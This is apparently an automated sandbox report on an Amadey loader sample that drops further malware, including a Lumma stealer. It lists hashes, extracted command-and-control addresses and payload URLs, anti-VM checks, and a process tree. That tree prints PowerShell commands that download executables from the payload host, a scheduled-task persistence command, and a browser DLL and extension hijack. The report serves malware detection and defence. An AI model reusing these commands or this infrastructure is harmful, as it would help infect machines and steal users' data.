Analysis
max time kernel: 143s
max time network: 128s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 19-05-2024 18:50
Static task: static1
Behavioral task: behavioral1
Sample: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Resource: win10v2004-20240426-en
General
Target: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Size: 1.8MB
MD5: f6986f363dde0d5f374abd0a1dac252b
SHA1: 4665c53ed2ce6bd84572fc398967d11421e00bab
SHA256: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512: 733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
SSDEEP: 49152:Cl/8HKuLWFBWcz/WrNKnun+YrhLOvn7e:8gLWnWczeNZn1VOf7
Malware Config
Extracted: https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted: https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
Extracted: https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
Extracted: amadey
- 4.20
- c767c0
- http://5.42.96.7
- install_dir: 7af68cdb52
- install_file: axplons.exe
- strings_key: e2ce58e78f631ed97d01fe7b70e85d5e
- url_paths: /zamo7h/index.php
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe, axplons.exe, axplons.exe, axplons.exe
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Blocklisted process makes network request 5 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe
flow | pid | Process
19 | 3876 | powershell.exe
22 | 1276 | powershell.exe
23 | 1276 | powershell.exe
25 | 4812 | powershell.exe
26 | 4812 | powershell.exe
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: axplons.exe, 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe, axplons.exe, axplons.exe
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Executes dropped EXE 10 IoCs
Processes: axplons.exe, Newoff.exe, vpn-1002.exe, lumma1234.exe, i0.exe, i0.tmp, axplons.exe, Newoff.exe, Newoff.exe, axplons.exe
pid | Process
4444 | axplons.exe
4840 | Newoff.exe
2968 | vpn-1002.exe
2056 | lumma1234.exe
4740 | i0.exe
5020 | i0.tmp
1112 | axplons.exe
4540 | Newoff.exe
4204 | Newoff.exe
1556 | axplons.exe
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes: axplons.exe, axplons.exe, axplons.exe, 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Loads dropped DLL 1 IoCs
Processes: vpn-1002.exe
pid | Process
2968 | vpn-1002.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
3 | checkip.amazonaws.com
27 | checkip.amazonaws.com
Drops file in System32 directory 1 IoCs
Processes: i0.tmp
description | ioc | Process
File created | C:\Windows\system32\shlwapi_p.dll | i0.tmp
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe, axplons.exe, axplons.exe, axplons.exe
pid | Process
1876 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
4444 | axplons.exe
1112 | axplons.exe
1556 | axplons.exe
Suspicious use of SetThreadContext 1 IoCs
Processes: lumma1234.exe
description | pid | Process | procid_target
PID 2056 set thread context of 4776 | 2056 | lumma1234.exe | 88
Drops file in Program Files directory 15 IoCs
Processes: chrome.exe, i0.tmp
description | ioc | Process
File created | C:\Program Files\scoped_dir3048_1233145289\extension.zip | chrome.exe
File created | C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\Extensions\updates.xml | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml | i0.tmp
File created | C:\Program Files\Online Security\unins000.dat | i0.tmp
File created | C:\Program Files\Online Security\is-98D24.tmp | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\chrome.exe.manifest | i0.tmp
File opened for modification | C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\Extensions\security.crx | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx | i0.tmp
File opened for modification | C:\Program Files\Online Security\unins000.dat | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest | i0.tmp
Drops file in Windows directory 1 IoCs
Processes: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
description | ioc | Process
File created | C:\Windows\Tasks\axplons.job | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Command and Scripting Interpreter: PowerShell 3 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe
pid | Process
3876 | powershell.exe
1276 | powershell.exe
4812 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes: taskkill.exe, taskkill.exe
pid | Process
1592 | taskkill.exe
4388 | taskkill.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 28 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe, axplons.exe, powershell.exe, powershell.exe, powershell.exe, axplons.exe, axplons.exe
pid | Process
1876 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
1876 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
4444 | axplons.exe
4444 | axplons.exe
3876 | powershell.exe
3876 | powershell.exe
1276 | powershell.exe
1276 | powershell.exe
4812 | powershell.exe
4812 | powershell.exe
1112 | axplons.exe
1112 | axplons.exe
1556 | axplons.exe
1556 | axplons.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe, taskkill.exe, taskkill.exe
description | pid | Process
Token: SeDebugPrivilege | 3876 | powershell.exe
Token: SeDebugPrivilege | 1276 | powershell.exe
Token: SeDebugPrivilege | 4812 | powershell.exe
Token: SeDebugPrivilege | 1592 | taskkill.exe
Token: SeDebugPrivilege | 4388 | taskkill.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: i0.tmp
pid | Process
5020 | i0.tmp
Suspicious use of WriteProcessMemory 56 IoCs
Processes: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe, axplons.exe, Newoff.exe, lumma1234.exe, vpn-1002.exe, cmd.exe, i0.exe, i0.tmp, cmd.exe, chrome.exe
description | pid | Process | procid_target (identical rows collapsed; repeat count in parentheses)
PID 1876 wrote to memory of 4444 | 1876 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe | 81 (3)
PID 4444 wrote to memory of 4840 | 4444 | axplons.exe | 82 (3)
PID 4840 wrote to memory of 2608 | 4840 | Newoff.exe | 83 (3)
PID 4840 wrote to memory of 2968 | 4840 | Newoff.exe | 85 (3)
PID 4444 wrote to memory of 2056 | 4444 | axplons.exe | 86 (3)
PID 2056 wrote to memory of 4776 | 2056 | lumma1234.exe | 88 (9)
PID 2968 wrote to memory of 5072 | 2968 | vpn-1002.exe | 89 (3)
PID 5072 wrote to memory of 3876 | 5072 | cmd.exe | 91 (3)
PID 5072 wrote to memory of 1276 | 5072 | cmd.exe | 92 (3)
PID 5072 wrote to memory of 4740 | 5072 | cmd.exe | 93 (3)
PID 5072 wrote to memory of 4812 | 5072 | cmd.exe | 94 (3)
PID 4740 wrote to memory of 5020 | 4740 | i0.exe | 95 (3)
PID 5020 wrote to memory of 4908 | 5020 | i0.tmp | 96 (2)
PID 4908 wrote to memory of 3048 | 4908 | cmd.exe | 98 (2)
PID 3048 wrote to memory of 4120 | 3048 | chrome.exe | 99 (2)
PID 5020 wrote to memory of 1436 | 5020 | i0.tmp | 100 (2)
PID 5020 wrote to memory of 3876 | 5020 | i0.tmp | 102 (2)
PID 5020 wrote to memory of 1592 | 5020 | i0.tmp | 104 (2)
PID 5020 wrote to memory of 4388 | 5020 | i0.tmp | 107 (2)
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 1876
  Level 2: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 4444
    Level 3: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 4840
      Level 4: C:\Windows\SysWOW64\schtasks.exe
        Command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
        - Creates scheduled task(s)
        PID: 2608
      Level 4: C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 2968
        Level 5: C:\Windows\SysWOW64\cmd.exe
          Command line: "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsu45F4.tmp\abc.bat"
          - Suspicious use of WriteProcessMemory
          PID: 5072
          Level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 3876
          Level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1276
          Level 6: C:\Users\Admin\AppData\Local\Temp\i0.exe
            Command line: i0.exe /verysilent /sub=1000
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
            PID: 4740
            Level 7: C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp" /SL5="$A00D4,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
              - Executes dropped EXE
              - Drops file in System32 directory
              - Drops file in Program Files directory
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of WriteProcessMemory
              PID: 5020
              Level 8: C:\Windows\system32\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""
                - Suspicious use of WriteProcessMemory
                PID: 4908
                Level 9: C:\Program Files\Google\Chrome\Application\chrome.exe
                  Command line: "C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj
                  - Drops file in Program Files directory
                  - Suspicious use of WriteProcessMemory
                  PID: 3048
                  Level 10: C:\Program Files\Google\Chrome\Application\chrome.exe
                    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x108,0x10c,0x110,0xe0,0x114,0x7ffd7d89ab58,0x7ffd7d89ab68,0x7ffd7d89ab78
                    PID: 4120
              Level 8: C:\Windows\system32\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\rolnzj.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""
                PID: 1436
              Level 8: C:\Windows\system32\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\zpksee > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""
                PID: 3876
              Level 8: C:\Windows\SYSTEM32\taskkill.exe
                Command line: "taskkill.exe" /f /im "msedge.exe"
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
                PID: 1592
              Level 8: C:\Windows\SYSTEM32\taskkill.exe
                Command line: "taskkill.exe" /f /im "chrome.exe"
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
                PID: 4388
          Level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4812
    Level 3: C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      PID: 2056
      Level 4: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        PID: 4776
Level 1: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID: 1112
Level 1: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  - Executes dropped EXE
  PID: 4540
Level 1: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  - Executes dropped EXE
  PID: 4204
Level 1: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID: 1556
Network
MITRE ATT&CK Enterprise v15
Downloads